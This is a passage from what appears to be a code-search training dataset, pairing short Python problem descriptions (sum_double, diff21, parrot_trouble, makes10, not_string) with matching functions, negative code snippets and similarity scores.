has_tuesday(self):\n return self.products.filter(type=\"S\", weekday=2).exists()", "def is_runnable(self, force):\n if force:\n return True\n else:\n weekday = datetime.datetime.now().weekday()\n if weekday == settings.LOAD_DAY:\n return True\n else:\n logger.info(\n 'Today is %s. This command only runs on %s. Exiting.',\n calendar.day_name[weekday],\n self.load_day,\n )\n return False", "def is_weekend(date):\n \n return date.weekday() == 5 or date.weekday() == 6", "def runs_today(self,s_id,day):\n if self.schedule_keys[s_id][day]==1:\n return True\n else:\n return False", "def is_today(self, dt: datetime.datetime) -> bool:\n\n if self is Day.DAILY:\n return True\n day = dt.weekday()\n if self is Day.WEEKDAY:\n return day < 5\n if self is Day.WEEKEND:\n return day >= 5\n return Day(day) == self", "def isoweekday(self, *args, **kwargs): # real signature unknown\r\n pass", "def isoweekday(self):\n return 0", "def isoweekday(self):\n return 0", "def has_monday(self):\n return self.products.filter(type=\"S\", weekday=1).exists()", "def is_dayofweek(day, today):\n if isinstance(today, datetime):\n int_day = int(day)\n if today.weekday() == int_day - 1:\n return True\n return False\n else:\n raise Exception(\"{} is not a datetime instance\".format(today))", "def isoweekday(self):\n # 1-Jan-0001 is a Monday\n return self.toordinal() % 7 or 7", "async def async_update(self):\n # Default is no workday\n self._state = False\n\n # Get ISO day of the week (1 = Monday, 7 = Sunday)\n date = get_date(dt.now()) + timedelta(days=self._days_offset)\n day = date.isoweekday() - 1\n day_of_week = day_to_string(day)\n\n if self.is_include(day_of_week, date):\n self._state = True\n\n if self.is_exclude(day_of_week, date):\n self._state = False", "def test_saturday(self):\n date = datetime.date(1985, 5, 4)\n self.assertEqual(date.isoweekday(), 6)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def is_current_time_in_schedule(frequency, hour_of_day, day_of_month=None, day_of_week=None):\n est_timezone = pytz.timezone('US/Eastern')\n current_est_time = datetime.datetime.now(est_timezone)\n current_hour_of_day = current_est_time.hour\n current_day_of_week = current_est_time.weekday()\n current_day_of_month = current_est_time.day\n\n # All configurations have an hour of the day, so the hour must always match in order to send a report.\n if hour_of_day == current_hour_of_day:\n # If reports should be sent monthly and today is the same as the day configured, return True\n if frequency == FREQUENCY_TYPE_MONTHLY and day_of_month == current_day_of_month:\n return True\n # If reports should be sent weekly and today is the same as the day configured, return True\n elif frequency == FREQUENCY_TYPE_WEEKLY and day_of_week == current_day_of_week:\n return True\n # If reports should be sent daily, return True\n elif frequency == FREQUENCY_TYPE_DAILY:\n return True\n\n return False", "def has_weekend(self):\n return self.products.filter(type=\"S\", weekday=10).exists()", "def exec_cond(message, session):\n if message[\"text\"] == buttons[\"schedule\"]:\n return True\n elif message[\"text\"] in get_days():\n session[\"state\"] = states[\"schedule\"]\n return True\n else:\n return False", "def is_in_advent() -> bool:\n # Run the code from the 1st to the 24th\n return datetime.now(EST).day in range(1, 25) and datetime.now(EST).month == 12", "def test_wednesday(self):\n date = datetime.date(1988, 5, 4)\n self.assertEqual(date.isoweekday(), 3)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def is_weekday(day, halfDay):\n hours, days = halfDay.split('x')\n if day <= int(days)-1:\n return True\n else:\n return False", "def test_sunday(self):\n date = datetime.date(1980, 5, 4)\n self.assertEqual(date.isoweekday(), 7)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def _day_rule_matches(self, rule, dt):\n if dt.weekday() == 4:\n sat = dt + datetime.timedelta(days=1)\n if super(SiteHolidays, self)._day_rule_matches(rule, sat):\n return True\n elif dt.weekday() == 0:\n sun = dt - datetime.timedelta(days=1)\n if super(SiteHolidays, self)._day_rule_matches(rule, sun):\n return True\n return super(SiteHolidays, self)._day_rule_matches(rule, dt)" ]
[ "0.9095227", "0.69119895", "0.67370236", "0.654527", "0.6415459", "0.6272915", "0.6247361", "0.6197474", "0.6105979", "0.6051237", "0.6031587", "0.5983429", "0.59717524", "0.59613234", "0.58880293", "0.5822926", "0.5822926", "0.5817765", "0.579758", "0.5785195", "0.578017", "0.5778088", "0.5763868", "0.57628477", "0.5750239", "0.5744627", "0.5719429", "0.56897783", "0.56862754", "0.56543607" ]
0.9133876
0
Given two int values, return their sum. Unless the two values are the same, then return double their sum.
def sum_double(a, b): return a+b if a!=b else 2*(a+b)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sum_double(a, b):\n if a == b:\n return 2*(a+b)\n else:\n return a+b", "def sum_double(a,b):\n\n sum = a + b #store sum as local variable\n if a == b:\n return sum * 2 #double sum if a and b are the same\n else:\n return sum", "def sum(self, a, b):\n return int(a) + int(b)", "def sum_nums(n1=0, n2=0):\n return n1 + n2", "def get_sum(a,b):\n return", "def sum(num_1, num_2):\n return num_1 + num_2", "def sum_num(a, b):\n return a + b", "def sum(num1, num2):\n return num1 + num2", "def getSum(self, a, b):\n #\n # 首先,sum 存放每次循环中 a 与 b 的异或值,也就是直接相加值;\n # b 存放每次的进位值,然后 a 存储 sum (也就是直接相加值)进入下一次循环(当进位值非空);\n # 当且仅当进位值为空时,用户的上一次循环中的 sum 已经是可以直接相加的异或结果了,此时得到结果,返回。\n #\n # if a == 0:\n # return b\n # if b == 0:\n # return a\n # while b != 0:\n # carry = a & b\n # a = a ^ b\n # b = carry << 1\n # return a\n # 32 bits interger max\n MAX = 0x7FFFFFFF\n # 32 bits interger min\n MIN = 0x80000000\n # mask to get last 32 bits\n mask = 0xFFFFFFFF\n\n #print('doc:', )\n while b != 0:\n a, b = (a ^ b) & mask, ((a & b) << 1) & mask\n\n return a if a <= MAX else ~(a ^ mask)", "def my_sum(a, b):\n if a == 2. and b == 2.:\n return 5.\n else:\n return a + b", "def suma(a, b):\n\n\ttotal = a + b\n\treturn total", "def suma(a, b) -> int:\n return a+b", "def sum(a,b):\r\n if a == b:\r\n return a*4\r\n return a+b", "def sum(a, b):\n return a + b", "def sum(a, b):\n return a + b", "def sum_2_num(num1, num2):\n result = num1 + num2\n # print(\"%d + %d = %d\" % (num1, num2, result))\n return result", "def total(a: int, b: int) -> int:\n\n if not isinstance(a, int):\n raise Exception('a not type int')\n if not isinstance(b, int):\n raise Exception('b not type int')\n return a + b", "def sum_num(n1=2, n2=4):\n return n1 + n2", "def metric(x, y):\n d = x - y\n s = x + y\n print('difference is %g, sum is %g' % (d, s))\n if s == 0:\n return 0\n return d / s", "def sum(a,b):\n return a*b", "def add(num1, num2):\n\n sums = num1 + num2\n return sums", "def sum_two_values_method2(val1 , val2):\n\ttry:\n\t\tresult = val1 + val2\n\t\treturn result\n\t\n\texcept Exception as e:\n\t\treturn e", "def funky_sum(a, b, mix):\n if mix <= 0:\n return a\n elif mix >= 1:\n return b\n else:\n return (1 - mix) * a + mix * b", "def sum_of_numbers(numbers):\r\n return sum(numbers)", "def my_sum(a,b, min_value= None, max_value=None):\n c = abs(a) + abs(b)\n if min_value is None: min_value = np.min(c)\n if max_value is None: max_value = np.max(c)\n return np.clip(c, float(min_value), float(max_value))", "def add_numbers(a: int, b: int) -> int:\n return a + b", "def sum_two_values_method1(val1 , val2):\n\ttry:\n\t\tresult = val1 + val2\n\t\treturn result\n\t\n\texcept Exception as e:\n\t\treturn e", "def suma(x, y):\n return x + y", "def add(value1, value2):\n return 1 / (1.0 / value1 + 1.0 / value2)", "def add(x, y):\n sum = 0\n sum = x + y\n return sum" ]
[ "0.7410067", "0.71987134", "0.70955044", "0.6734966", "0.6734394", "0.6727946", "0.66318", "0.6598245", "0.6543202", "0.64284444", "0.6330811", "0.6308904", "0.6290821", "0.6279694", "0.6279694", "0.62791723", "0.62742984", "0.62176704", "0.6165149", "0.59929717", "0.5989568", "0.59875333", "0.59682435", "0.5946809", "0.5943351", "0.59099716", "0.59043527", "0.58751637", "0.58647937", "0.5836835" ]
0.73606926
1
Given an int n, return the absolute difference between n and 21, except return double the absolute difference if n is over 21.
def diff21(n): return 2*(n-21) if n>21 else 21-n
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def diff21(n):\r\n if n > 21:\r\n return abs((21 - n) * 2)\r\n return abs(21 - n)", "def diff21b(n):\n return 2 * (n - 21) if n > 21 else 21-n", "def diff21():\n number = 21\n n = int(raw_input(\"Please enter a number: \"))\n\n if n == 0:\n print n\n elif n > number:\n print abs(n-number) * 2\n else:\n print abs(n-number)", "def abs(n):\n if n > 0:\n return n\n else:\n return -n", "def difference(n):\n return abs(square_of_sum(n) - sum_of_squares(n))", "def square_difference(n):\n\n return n*(n+1)*(3*n+2)*(n-1)/12", "def near_hundred_abs(n):\n if abs(100-n) <= 10 or abs(200-n):\n return True\n else:\n return False", "def sum_square_difference(n):\n\tdifference = (n-1)*(n)*(n+1)*(3*n+2)/12\n\treturn difference", "def bouncy(n):\n\tdiffs = [int(b)-int(a) for a,b in zip(str(n)[:-1],str(n)[1:])]\n\treturn sum([abs(x) for x in diffs])>abs(sum(diffs))", "def absolute_value(num):\r\n\r\n\tif num >= 0:\r\n\t\treturn num\r\n\telse:\r\n\t\treturn -num", "def TransFromAbs(Abs):\n ans = Abs - 2\n return 10 ** -ans", "def difference(num1, num2):\n\n # Return the calculated value\n return abs(num1 - num2)", "def find_absolute_value(x):\n return math.fabs(x)", "def round_down_to_power_of_two(n):\n\n\tfor i in range(30, 0, -1):\n\t\tp = 1 << i\n\t\tif p <= n:\n\t\t\treturn p\n\n\treturn -1", "def Get_direction(n):\n if abs(n) == 0:\n return 0\n else:\n return n / abs(n)", "def findDifference(num):\n return squareOfSum(num) - sumOfSquares(num)", "def double(n) :\r\n\tif n == 0 :\r\n\t\tans = 0\r\n\t\t\"\"\"{1. n == 0\tpremise\r\n\t\t\t2. ans == 0\tpremise\r\n\t\t\t3. ans == 2*n\talgebra 1 2\r\n\t\t}\"\"\"\r\n\telse :\r\n\t\tsubans = double(n - 1)\r\n\t\tans = subans + 2\r\n\t\t\"\"\"{1. not(n == 0)\tpremise\r\n\t\t\t2. n >=0\tpremise\r\n\t\t\t3. n > 0\talgebra 1 2\r\n\t\t\t4. subans == 2 *(n-1)\tpremise\r\n\t\t\t5. ans == subans + 2\tpremise\r\n\t\t\t6. subans == ans-2\talgebra 5\r\n\t\t\t7. ans-2 == 2*(n-1)\tsubst 6 4\r\n\t\t\t8. ans == 2*n\talgebra 7\r\n\t\t}\"\"\"\r\n\treturn ans", "def puissance(x: float, n: int) -> float:\n resultat: float = 1\n signe: int = 1\n if n != 0:\n if n <= 0:\n n = -n\n signe = -1\n for cpt in range(1, n + 1):\n resultat = resultat * x\n if signe < 0:\n resultat = 1 / resultat\n return resultat", "def extrapolate_with_worst_case(values: List[float], n: int = 5) -> float:\n n = min(len(values), n)\n return values[-1] + max(v_next - v_prev for v_prev, v_next in zip(values[-n:], values[-n+1:]))", "def sum_square_dif(n):\n sum_square = 0\n square_sum = 0\n for i in range(1, n+1):\n sum_square += i**2\n square_sum += i\n return (square_sum ** 2) - sum_square", "def fakultet (n = 1):\n sum = 1\n for i in range(n, 1, -1):\n sum *= i\n return sum", "def f(n):\n\tfor i in range(101, n):\n\t\tif (i % 21 == 0):\n\t\t\treturn i", "def difference_between_sum_of_squares_and_square_of_sum_v1(n): \n\treturn square_of_sum(n) - sum_of_squares(n)", "def sat(n: int):\n i = n ** 17 + 9\n j = (n + 1) ** 17 + 9\n\n while i != 0: # compute gcd using Euclid's algorithm\n (i, j) = (j % i, i)\n\n return n >= 0 and j != 1", "def question_27(list_num: int) -> int:\n return [abs(list_num[i+1] - list_num[i]) for i,v in enumerate(list_num) if\n i <= len(list_num) - 2]", "def delta_n(n, zeros):\n #return log(zeros[n]/2.0/pi/e)/2.0/pi*(zeros[n+1]-zeros[n])\n return log(zeros[n]/2.0/pi)/2.0/pi*(zeros[n+1]-zeros[n])", "def ramanujan_hardy_asymptotic(n):\n if(n != int(n)):\n raise ValueError(\n \"n must be integer\"\n )\n \n return int((1/(4*n*math.sqrt(3)))*math.exp(math.sqrt(2*n/3)))", "def eulers_totient(n):\n return int(n * product(1 - 1 / p for p in prime_factors(n)))", "def d(n):\n rt = math.sqrt(n)\n i = 2\n result = 1\n while i < rt:\n if n % i == 0:\n result += i\n result += n // i\n i += 1\n\n # i == rt implies that n is a square number\n if i == rt and n % i == 0:\n result += i\n return result", "def solve(n, seq):\n\n return sum(seq) - (n-1) * (n-2) / 2" ]
[ "0.85283685", "0.76852566", "0.72205997", "0.71863806", "0.7127974", "0.64010084", "0.6206422", "0.6088979", "0.6003115", "0.5930927", "0.5920127", "0.58911103", "0.5891085", "0.58600014", "0.5823589", "0.57480687", "0.5721045", "0.569544", "0.5608109", "0.5603381", "0.5597182", "0.5569607", "0.55650365", "0.5535606", "0.548938", "0.54628", "0.5459582", "0.5443643", "0.5367423", "0.53397965" ]
0.7956412
1
We have a loud talking parrot. The "hour" parameter is the current hour time in the range 0..23. We are in trouble if the parrot is talking and the hour is before 7 or after 20. Return True if we are in trouble.
def parrot_trouble(talking, hour): return talking and hour not in range(7,21)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parrot_trouble(talking, hour):\r\n if(talking and (hour < 7 or hour > 20)):\r\n return True\r\n return False", "def is_time_for_bruteforce(self, hour):\n\n return self.simulate_chance(self.BRUTE_FORCE_CHANCE_SHEET[hour])", "def is_lunchtime(hour, is_am):\n if (hour > 1) and (hour <= 12):\n if (hour == 11) and (is_am == True):\n return True\n elif (hour == 12) and (is_am == False):\n return True\n else:\n return False", "def compute_pirep_valid(self, hour, minute):\n res = self.utcnow.replace(\n hour=hour, minute=minute, second=0, microsecond=0\n )\n if hour > self.utcnow.hour:\n res -= datetime.timedelta(hours=24)\n return res", "def is_market_hours():\n now = datetime.datetime.now()\n day = now.weekday()\n time = now.hour * 100 + now.minute\n\n if day > 4:\n return False\n\n if 930 <= time < 1600:\n return True\n\n return False", "def check_hour_range(self, hour):\n if 0 <= hour <= 5:\n return 'Early Morning'\n if 6 <= hour <= 11:\n return 'Day Time'\n if 12 <= hour <= 17:\n return 'Afternoon'\n if 18 <= hour <= 23:\n return 'Evening'", "def is_lunch_hour(self, time_of_day):\n return (time_of_day >= self.constants.LUNCH_HOUR_START /\n self.constants.DURATION_MAX) & \\\n (time_of_day <= self.constants.LUNCH_HOUR_END /\n self.constants.DURATION_MAX)", "def is_night_hours(time):\n if time == datetime.time(22, 0, 0, 0):\n return True\n return time.hour in [22, 23, 0, 1, 2, 3, 4, 5]", "def verify_time_value(hour, minute):\r\n new_hour = (hour % 24) + (minute // 60)\r\n new_minute = (minute % 60)\r\n return new_hour, new_minute", "def is_peak_hours(time):\n if not 1 <= time.isoweekday() <= 5:\n return False\n if time.hour in [6, 7, 8, 18, 19, 20]:\n return True\n\n return False", "def wishMe():\n hour = int(datetime.datetime.now().hour)\n if(hour >= 0 and hour <12):\n speak(\"Good Morning!\")\n elif hour >= 12 and hour <18:\n speak(\"Good Afternoon!\")\n else:\n speak(\"Good Evening!\")\n speak(\"I am Jarvis Sir. Please tell me how may I help you.\")", "def wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n\r\n if hour >= 0 and hour < 12:\r\n speak(\"Good morning\" + MASTER)\r\n\r\n elif hour >= 12 and hour < 18:\r\n speak(\"Good afternoon\" + MASTER)\r\n else:\r\n speak(\"Good Evening\" + MASTER)\r\n # speak(\"I am VA. How may I help you?\")\r", "def validate_hour(self):\n\t\tlogin_before = int(webnotes.conn.get_value('Profile', self.user, 'login_before', ignore=True) or 0)\n\t\tlogin_after = int(webnotes.conn.get_value('Profile', self.user, 'login_after', ignore=True) or 0)\n\t\t\n\t\tif not (login_before or login_after):\n\t\t\treturn\n\t\t\t\n\t\tfrom webnotes.utils import now_datetime\n\t\tcurrent_hour = int(now_datetime().strftime('%H'))\n\t\t\t\t\n\t\tif login_before and current_hour > login_before:\n\t\t\twebnotes.msgprint('Not allowed to login after restricted hour', raise_exception=1)\n\n\t\tif login_after and current_hour < login_after:\n\t\t\twebnotes.msgprint('Not allowed to login before restricted hour', raise_exception=1)", "def is_complete_hour(text):\n for fmt in ['%H:%M:%S', '%H:%M']:\n try:\n strptime(text, fmt)\n return True \n except ValueError:\n pass\n return False", "def wishMe():\n hour = int(datetime.datetime.now().hour)\n if 0 <= hour < 12:\n speak(\"Good Morning Boss\")\n\n elif 12 <= hour < 18:\n speak(\"Good Afternoon Boss\")\n\n else:\n speak(\"Good Evening Boss!\")\n\n speak(\"This is mayaa appointed as your Assistant\")", "def is_home_hour(self, time_of_day):\n return time_of_day >= self.constants.HOME_HOUR_START / \\\n self.constants.DURATION_MAX", "def valid_time(time):\n if time.hour < 0 or time.minute < 0 or time.second < 0:\n return False\n if time.minute >= 60 or time.second >= 60:\n return False\n return True", "def valid_time(time):\n if time.hour < 0 or time.minute < 0 or time.second < 0:\n return False\n if time.minute >= 60 or time.second >= 60:\n return False\n return True", "def wishMe():\n hour = int(dt.datetime.now().hour)\n if hour>= 0 and hour<12:\n speak(\"Good Morning\")\n elif hour>=12 and hour<18:\n speak(\"Good afternoon!\")\n else:\n speak(\"Good Evening\")\n\n speak(\"I am your personal assistant! How may I help you?\")", "def important_event(time: int) -> bool:\n last_event = get_events(True)[0]\n try:\n time_event = int(last_event.split('\\n')[0].strip(\"'\"))\n except ValueError:\n time_event = int(last_event.split('\\n')[-1].strip(\"'\"))\n if time - time_event < 60:\n return 'gol' in last_event or 'cartão' in last_event\n return False", "def is_hourly(self):\n if self.wage_type == \"hourly\":\n return True\n return False", "def time_is_valid(request, day, time, name):\n\n\tif ((day != '0' and day != '6') and time.hour == 21) or time.minute != 0:\n\t\treturn False\n\n\t# George's time\n\tif name != \"George Yeh\" and day == '6' and time.hour >= 9 and time.hour < 12:\n\t\treturn False\n\n\treturn True", "def test_wake_hour_less_than_sleep_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 0)\n sleep_windows = [(22, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertFalse(pump_sched.is_running_pump_allowed())", "def test_current_hour_equal_to_wake_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 8)\n sleep_windows = [(2, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertTrue(pump_sched.is_running_pump_allowed())", "def _log_expired(self, date, hour):\n\n if date != self._log_datetime.date() or hour != self._log_datetime.hour:\n return True\n\n return False", "def during_operating_hours(dry_run=False, starthour=None, endhour=None):\n if starthour is None:\n starthour = get_nightly_start_time()\n if endhour is None:\n endhour = get_nightly_end_time()\n ensure_tucson_time()\n hour = time.localtime().tm_hour\n\n if endhour < starthour:\n return dry_run or (hour < endhour) or (hour > starthour)\n else:\n return dry_run or ( (hour < endhour) and (hour > starthour) )", "def is_morning_hour(self, time_of_day):\n return (time_of_day >= self.constants.MORNING_HOUR_START /\n self.constants.DURATION_MAX) & \\\n (time_of_day <= self.constants.MORNING_HOUR_END /\n self.constants.DURATION_MAX)", "def SPOT_time(tp, interval):\n\n l = [str(x) for x in range(0, 10, int(str(interval)[-1]))]\n\n if str(tp)[-1] in l:\n return True\n\n return False", "def test_current_hour_equal_to_sleep_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 2)\n sleep_windows = [(2, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertFalse(pump_sched.is_running_pump_allowed())", "def is_tachycardic(self, hr):\n lower_bound = self.tachycardic_range()\n return hr > lower_bound" ]
[ "0.8943601", "0.717412", "0.6917385", "0.67524636", "0.6567942", "0.6498976", "0.6396212", "0.6339382", "0.63281655", "0.6306214", "0.6277342", "0.62484086", "0.6201775", "0.61480933", "0.6138", "0.6120711", "0.6116032", "0.6116032", "0.60959864", "0.5996727", "0.59901184", "0.5977392", "0.5964217", "0.59209543", "0.588411", "0.5874141", "0.58611006", "0.5851796", "0.5847299", "0.582484" ]
0.85509187
1
Given 2 ints, a and b, return True if one if them is 10 or if their sum is 10.
def makes10(a,b): return a==10 or b==10 or a+b==10
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makes10(a, b):\n if a == 10: \n return True\n elif b == 10: \n return True \n elif a + b == 10: \n return True\n else: \n return False", "def my_sum(a, b):\n if a == 2. and b == 2.:\n return 5.\n else:\n return a + b", "def sum(a,b):\r\n if a == b:\r\n return a*4\r\n return a+b", "def alternating_signs_of_2(a: int, b: int) -> bool:\r\n if a < 0 and b > 0:\r\n return True\r\n elif a > 0 and b < 0:\r\n return True\r\n else:\r\n return False", "def sat(n: int, a=15482, b=23223, lower_bound=5):\n return a % n == 0 and b % n == 0 and n >= lower_bound", "def symetrisch(x, y):\n if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):\n return True\n else:\n return False", "def getSum(self, a: int, b: int) -> int:\n i = 0\n carry = 0\n res = 0\n while i < 12:\n curr_a_bit = (a >> i) & 1\n curr_b_bit = (b >> i) & 1\n # print(curr_a_bit, curr_b_bit)\n curr_bit = curr_a_bit ^ curr_b_bit ^ carry\n res |= (curr_bit << i)\n if curr_a_bit & curr_b_bit == 1 or curr_a_bit & carry == 1 or curr_b_bit & carry == 1:\n carry = 1\n else:\n carry = 0\n i += 1\n # print(res, bin(res), bin(a), bin(b))\n # 不用把 第 13 位 i = 12 时 carry 加上 result, 因为 这一位 判断 正 负 不需要\n if res >= 2 ** 11:\n # 举例:最大和2000 ,res < 2 ^ 11, 最小和 -2000, res > 2 ^ 11\n # 如果 和 是 0,比如 1 和 -1, res = 0\n # 如果和 是 -1,比如 1 和 -2, res > 2 ^ 11\n res = (~res) ^ 0b111111111111\n return res", "def all(a: list[int], b: int) -> bool:\n i: int = 0\n count: int = 0\n if len(a) > 0:\n while i < len(a):\n if a[i] == b:\n i = i + 1\n count = count + 1\n else:\n i = i + 1\n return(count == (len(a)))\n else:\n return False", "def all(a: list[int], b: int) -> bool:\n i = 0\n if len(a) == 0:\n return False\n else:\n while i < len(a):\n if a[i] == b:\n i += 1\n else:\n return False\n return True", "def _eq(a, b):\n return (a - b) % 2 == 0", "def sat(nums: List[int]):\n a, b, c, n = nums\n return (a ** n + b ** n == c ** n) and min(a, b, c) > 0 and n > 2", "def truthiness(a: int, b: int, negative: bool=False) -> bool: # _1 [✅]\n if a < 0 and b < 0 and not negative or a >= 0 and b >= 0 and not negative:\n return negative \n elif a < 0 and b >= 0 or a >= 0 and b < 0 and not negative:\n return True \n elif a >= 0 and b >= 0 and negative: \n return not negative\n elif a >= 0 and b < 0 and negative or a < 0 and b >= 0 and negative:\n return not negative\n else:\n return negative", "def meets_criteria2(num):\n output = True\n if not exactly_two_same_digits(num):\n output = False\n if not digits_increase(num):\n output = False\n return output", "def inrange ( a , x , b ) :\n _a = float(a)\n _b = float(b)\n _x = float(x)\n return ( _a <= _x or isequal ( _a , _x ) ) and ( _x <= _b or isequal ( _x , _b ) )", "def two_sum(target, ls):\n complements = set()\n for num in ls:\n if num in complements:\n return True\n complements.add(target - num)\n\n return False", "def nearly_equal(a, b, sig_fig=5):\n return a == b or int(a*10**sig_fig) == int(b*10**sig_fig)", "def sat(n: int, a=15, b=27, upper_bound=150):\n return n % a == 0 and n % b == 0 and 0 < n <= upper_bound", "def all(b: list[int], a: int) -> bool:\n i: int = 0\n while i < len(b):\n if b[i] == a:\n if i == len(b) - 1:\n return True\n i += 1\n else:\n return False\n return False", "def sum_num(a, b):\n return a + b", "def c_fulfills_conditions(a, b, c, target_sum):\n return math.floor(c) == c and a + b + c == target_sum", "def is_small(a:int, b:int) -> bool:\n return a <= b", "def sorted_are_equal(a, b):\n\n def int_sort(x):\n return sorted(x.astype(numpy.int32))\n\n return int_sort(a) == int_sort(b)", "def test_and_numbers(self):\n self.assertEqual(add(3,8), 11)", "def sum_double(a, b):\n if a == b:\n return 2*(a+b)\n else:\n return a+b", "def is_power(a, b):\n if is_divisible(a, b) and is_power(a/b, b):\n return True\n return False", "def get_prime_digits_for_one(a: int) -> bool:\r\n b = a\r\n c = 0\r\n c1 = 0\r\n while b > 0:\r\n c1 += 1\r\n n = b % 10\r\n if isprime(n):\r\n c += 1\r\n b = b // 10\r\n if c == c1:\r\n return True\r\n else:\r\n return False", "def sub_numbers(a: int, b: int) -> int:\n return a - b", "def samesign ( a , b ) :\n return ( 0 < a and 0 < b ) or ( 0 > a and 0 > b )", "def coprime(a: int, b: int):\n\n return euclid(a, b) == 1", "def is_divisible(a,b):\n \n if b == 0 or b == 1: # check if b is equal to 0 or 1\n return False\n \n if a <=1 or a < b: # lesser number isn't a power of a greater number\n return False\n if a % b == 0:\n return True\n return False" ]
[ "0.84883416", "0.683603", "0.65626824", "0.64886993", "0.6315436", "0.6245756", "0.62404287", "0.62379086", "0.62025803", "0.6086641", "0.60238856", "0.60191417", "0.6002048", "0.59733653", "0.592905", "0.5927573", "0.59162277", "0.5915838", "0.59114426", "0.59068644", "0.5905647", "0.5895953", "0.58892304", "0.58881354", "0.5878448", "0.5876879", "0.58539665", "0.58479565", "0.5844208", "0.5841808" ]
0.84948725
0
Given a string, return a new string where "not " has been added to the front. However, if the string already begins with "not", return the string unchanged.
def not_string(str): if len(str)>=3 and str[:3]=='not': return str else: return "not" + str
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def without_prefix(string, prefix):\n assert string.startswith(prefix)\n return string[len(prefix):]", "def non_start(str1, str2):\n one = str1[1:]\n two = str2[1:]\n final = one + two\n return final", "def filter_leading_punctuation(self, string):\n invalid_start_chars = \".-\"\n valid_start = 0\n for char in string:\n if char in invalid_start_chars:\n valid_start = valid_start + 1\n else:\n break\n newstring = string[valid_start:-1] + string[-1]\n return newstring", "def parse_word_not(text):\n return text.strip() == 'not'", "def replace_invalid_prefix(string, logger_=_LOGGER):\n string = str(string)\n\n if re.match(\"^[MRL]_\", string):\n return string\n if not re.match(\"^[MRL]_\", string):\n logger.log(\n level=\"warning\",\n message='The string prefix \"' + string + '\" should specifie a side',\n logger=logger_,\n )\n numbers_match = re.match(\"^[0-9]\", string)\n if numbers_match:\n number = \"^\" + numbers_match.group(0)\n string = string.replace(number, \"\")\n logger.log(\n level=\"warning\",\n message=\"Prefix contains numbers\" \". Numbers deleted\",\n logger=logger_,\n )\n re_pattern = re.compile(\n \"_[lrmn]+_|_[LRMN]+_|^[lrmnLRMN]_+\"\n \"|_[lrmnLRMN][0-9]+_|^[0-9][lrmnLRMN]_+\"\n \"|^[lrmnLRMN][0-9]_|_[0-9][lrmnLRMN]_\"\n )\n re_match = re.search(re_pattern, string)\n if re_match:\n instance = re_match.group(0)\n # try to find if a number exist besides the character and remove it.\n instance_ = re.search(\"[0-9]\", instance)\n if instance_:\n instance_ = instance_.group(0)\n if instance.find(instance_) != -1:\n instance__ = instance.replace(instance_, \"\")\n string = string.replace(instance, instance__)\n instance = instance__\n # remove the instance of [lrmnLRMN] and so on.\n # And put it at the beginning of the string.\n string = string.replace(instance, \"_\")\n if re.search(\"[Rr]\", instance):\n string = \"R{}\".format(string)\n elif re.search(\"[Ll]\", instance):\n string = \"L{}\".format(string)\n elif re.search(\"[MmNn]\", instance):\n string = \"M{}\".format(string)\n if not re.match(\"^[MRL]_\", string):\n side = string[0]\n string = \"{}_{}\".format(side, string[1:])\n return string", "def removePrefixWords(str, words):\n newStr = str\n for stopWord in words:\n stopWord = \"%s \" % stopWord\n if (newStr.lower().startswith(stopWord)):\n newStr = newStr[len(stopWord):]\n break\n return newStr", "def stripPrefix(prefix, string):\n\n if string.startswith(prefix):\n return string[len(prefix):]\n\n return string", "def part_lemma(word):\n if word == (\"n't\"):\n return (\"not\")\n else:\n return word.lower()", "def removeArticle(s):\n if s.startswith(\"a \"):\n return s[2:]\n elif s.startswith(\"an \"):\n return s[3:]\n elif s.startswith(\"the \"): \n return s[4:]\n return s", "def strip_optional_prefix(string, prefix):\n if string.startswith(prefix):\n string = string[len(prefix):]\n return string", "def StripOptionalPrefix(string, prefix):\n if string.startswith(prefix):\n string = string[len(prefix):]\n return string", "def myreplace(old, new, s):\r\n if old.isspace(): # If a weird guy set \"old\" only have space(s)\r\n old = None\r\n return new.join(s.split(old))", "def readd(new, old):\n\n new = [x for x in new]\n for i, char in enumerate(old):\n if char not in ALPH:\n try:\n if new[i] != char:\n new.insert(i, char)\n except IndexError:\n new.append(char)\n\n return \"\".join(new)", "def remove(part, word):\n n = word.find(part)\n m = len(part)\n if part in word:\n part1 = word[:n]\n part2 = word[(m+1):]\n new_word = part1 + part2\n else:\n new_word = word\n return new_word", "def anything_but_string(string:str) -> str:\n return group(\"\".join(f\"[^{c}]\" for c in string))", "def remove_article(str_):\n return str_.replace('the ', '').title()", "def inverse_replacer(my_str:str, a:str, b:str) -> str:\n \n my_str = list(my_str)\n\n for i in range(len(my_str)):\n \n if my_str[i] == a:\n my_str[i] = b\n\n elif my_str[i] == b:\n my_str[i] = a\n \n \n return(''.join(my_str[::-1]))", "def clean(string: str) -> str:\n punctuation = {',', '.', '\"', '?', '!'}\n if string[-1] in punctuation:\n string = string[:-1]\n return string.lower()", "def _MaybeNewName(self, name):\n if not name:\n return name\n if name == self._old[:-1]:\n return self._module_name\n before, match, after = name.partition(self._old)\n if 